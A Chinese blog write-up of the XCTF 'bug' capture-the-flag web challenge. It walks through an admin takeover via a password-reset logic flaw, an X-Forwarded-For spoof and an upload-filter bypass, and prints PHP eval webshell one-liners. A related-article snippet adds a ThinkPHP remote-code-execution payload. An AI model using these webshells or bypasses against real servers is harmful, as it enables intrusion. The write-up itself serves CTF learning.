XCTF-高手进阶区:bug

最新推荐文章于 2023-07-18 14:32:22 发布
最新推荐文章于 2023-07-18 14:32:22 发布
阅读量497 收藏 3
点赞数
分类专栏: CTF刷题 文章标签: XCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/105490886
版权

题目:
在这里插入图片描述
进去后发现如下所示:
在这里插入图片描述
我注册了一个peak账号,登录后显示如下:
在这里插入图片描述
经过一番测试,发现Manage需要admin权限:
在这里插入图片描述
如何获取admin权限呢?利用修改密码界面的逻辑漏洞,修改admin的密码,如下:
在这里插入图片描述
再次点击Manage会出现
在这里插入图片描述
我们使用XFF绕过IP限制
X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP
在这里插入图片描述

<!--index.php?module=filemanage&do=???-->
这个明显是让我们猜,这里最后根据前面filemanage(文件管理),猜到upload(上传)

在这里插入图片描述
尝试上传一个peak.php文件:<?php @eval($_REQUEST[peak]);?>
在这里插入图片描述
发现无法上传,被判断为php文件,通过在上传时可以抓包,可以发现是后端验证,尝试00截断:
在这里插入图片描述
再猜测可能是过滤代码中的特殊字符,例如?,那我们将peak.php内容修改为:<script language="php">@eval($_REQUEST[peak])</script>,再次上传,00截断也不ok,依旧未果,还能咋办?
最后发现php4和php5可以上传但返回不是图像…好!那我们就修改MIME
在这里插入图片描述
修改文件名为peak.jpg,结果不行!那就是peak.php的内容有问题,目标服务器有过滤,那我们继续使用<script language="php">@eval($_REQUEST[peak])</script>来绕过,得到flag
在这里插入图片描述

注:经测试
(1)如果你的peak.php5文件内容中没有任何php内容还不行,例:
在这里插入图片描述
(2)文件必须能被php解析执行
在这里插入图片描述

总结:这题主要考查

  • 对逻辑漏洞的认识
  • 对敏感目录的猜测
  • 文件上传的绕过(需要注意的是,有时候常用的一句话木马,有可能会被过滤!)
  • 绕过要求:MIME类型是图片;文件名能被php解析执行;文件内容既要是php文件,而且你php文件中的内容还不能这么明显,难搞哦
1stPeak
关注
专栏目录
xctf-bug(绕过)
qq_37027540的博客
10-07 714
基于逻辑漏洞文件上传绕过的ctf 题目的网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4768&page=1 打开页面就出现弹窗说需要登录 我首先的思路就是会不会有弱口令,或者是存在sql注入,使用sqlmap进行扫描,没有发现注入点 只能先注册一下账号,进入查看一...
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 234
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
XCTF-高手进阶:baby_web
1stPeak's Blog
02-29 477
注意题目的提示:初始页面,那么应该是index.php,但是输入index.php后又自动跳转到1.php,因为跳转,我们就使用F12或bp抓包查看index.php
XCTF-高手进阶:mfw
1stPeak's Blog
06-13 3872
XCTF-高手进阶-第三题:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
bug-xctf
怪味巧克力的博客
06-04 374
0x01 进入页面,发现有登陆界面,有注册,有找回密码。我们先试试,所以这里我们先注册一个用户 注册成功,那么我们登陆看看有没有什么值得关注的地方 看我箭头标的地方,第一个提示我们的用户是123,然后还有其他的几个功能,这几个其他的功能都可以进,唯独第二个Manage无法进去,提示信息如下 所以,我们不是admin用户,那么如何登陆admin用户呢?首先注册肯定不行,因为账号已存在,那么我们怎么搞到admin的密码呢?还有一个功能我们忽略了,那就是找回密码,我们进去看看 到这里,思路就是我们进
XCTF web bug
H4ppyD0g的博客
09-06 396
注册后登陆,发现有manage,点击一下,说不是管理员,没有权限,那就得想办法获得管理员权限 退出,回到登录界面,点击Findpwd 输入信息后第二步就可以直接修改密码了。这个时候用burpsuite抓包,把user改成admin就可以把admin改成想要的密码。 登录admin,再点击manage,ip不允许,修改XFF头为127.0.0.1可以访问。 在网页源代码中发现传参,把do设为uplo...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 308
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
XCTF-WEB进阶-PHP2
Lorezon的博客
03-14 163
打开题目发现只有一行字: 既然没什么有用的信息就看看常见的index页面,但是发现依然没有什么有用的信息,查看忽略的phps页面,有了结果: 得到了代码,查看源码进行分析 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($...
XCTF-RE】新手练习-no-strings-attached-解压密码:十三陵陈飞宇.rar
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/qffkcv
攻防世界XCTFbug
末初的CSDN博客
03-07 983
首先注册一个用户 登入后 点击Manage弹出一下弹窗,存在admin账号,想办法登入管理员。 登入页面的这些功能都抓包看了,直接修改传参都无效。之前在登录页面存在一个寻找密码的功能,我们尝试一下。 抓包修改密码 把username改为admin试一试。 重置管理员密码成功。登录管理员账号。 点击manage功能弹窗IP Not allowed 根据多年经验,猜测需要重本地登录...
XCTF bug wp
weixin_45253216的博客
01-15 202
网安菜鸡今天又来划水了 CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 题目 首先打开题目,是一个登陆注册框 有用户名和密码,没有用户名密码可以注册,忘记密码可以找回,先随便注册一个,看看是何方神圣。 显示我们uid是5,emmm猜测一波咱们可能是第五个注册的用户。 进来发现了几个供我们选择的选项,有管理,个人信息查看,修改密码,退出登录。 点了一圈发现manage需要admin权限 考虑怎么能拿到admin权限,思路
XCTF BUG( 越权 修改forwarded头 文件上传) UNFINSH(二次注入 python脚本) 学习过程
AAAAAAAAAAAA66的博客
03-13 4795
最近忙着入职和处理一些杂事,更新的确比较少了。不过在周末还是正好有空的,正好刷刷XCTF。 目录 XCTF BUG 注册账号 越权漏洞 文件上传 XCTF UFINISH XCTF BUG 首先进行常规的信息收集:F12查看源码,robots.txt 文件,无果, 简单注入语句 无果 考虑到登陆界面是否有二次注入 burpsuite 简单抓包 发现cookie中只存在一个SESSION 尝试弱口令无果。 所以只能从网站的功能落手了。 注册账号 登陆进去把所...
XCTF-高手进阶:upload1
1stPeak's Blog
02-29 803
1、访问题目 2、测试 说明存在前端过滤,只能上传图片文件 3、解决方法:先将含有一句话木马的1.php后缀修改为x.jpg来绕过前端认证,同时使用bp抓包,再修改后缀为php,从而可以使用蚁剑连接 当然,这里可以使用URL利用 注:这里直接访问不会显示,因为是php代码,没有输出,所以需要查看网页源代码 ...
csrf漏洞防御方案_XFF漏洞攻击原理及防御方案
weixin_39962889的博客
12-21 524
01常见HTTP头注入参数在介绍XFF注入之前,我们先来了解下常见的存在HTTP头注入的参数,如下图:User-Agent:使得服务器能够识别客户使用的操作系统,浏览器版本等.(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中)Cookie:网站为了辨别用户身份进行session跟踪,并储存在用户本地终端上的数据(通常经过加密)X-Forwarded-For:简称XFF头,代...
X-Forwarded-For
yuange
04-25 7400
问题背景 在Web应用开发中,经常会需要获取客户端IP地址。一个典型的例子就是投票系统,为了防止刷票,需要限制每个IP地址只能投票一次。 如何获取客户端IP 在Java中,获取客户端IP最直接的方式就是使用request.getRemoteAddr()。这种方式能获取到连接服务器的客户端IP,在中间没有代理的情况下,的确是最简单有效的方式。但是目前互联网Web应用很少会将应用服务器直接对外提...
PHP特性之CTF中常见的PHP绕过
最新发布
Welcome To Myon'Blog !
07-18 6526
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
XCTF攻防世界_Web练习
FAFU小宋的博客
10-30 538
XCTF_Web_新手练习view_sourceget_postrobotsbackupcookiedisabled_buttonweak_authsimple_phpxff_refererwebshellcommand_executionsimple_js view_source 这里右键无法查看网页源代码,可通过f12键或者在url地址前加上"view-source:"查看网页源代码找到flag。 get_post HTTP常用的请求方法:get,post。 (1)直接把请求参数拼接在URL后面,
XDCTF 2015 Filemanager (攻防世界web)
weixin_43610673的博客
07-22 1529
这题看似文件上传,其实主要是利用sql注入修改指定文件名再数据库中的后缀名为空 /www.tar.gz 下载源码审计 数据库的字段结构为 同时代码中由于白名单限制,所以无法上传恶意文件,由于版本限制也不能用%00截断,但有一个rename功能,只能修改文件名,但可以通过sql注入,影响其extension为空,再修改文件时加上.php后缀 先上传一个用来sql注入的文件 修改文件名 新的文件名为test2.txt.txt 但数据库中经过update语句 update `file` set `file
XCTF移动应用逆向分析:解密安卓app2
作者提供了一个名为XCTF-mobile app2的安卓应用作为示例,用于教学如何进行逆向分析并找到隐藏的flag。" 在安卓逆向工程中,首要步骤是获取应用程序的内部数据。在这个案例中,首先需要将APK安装包的后缀更改为.zip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值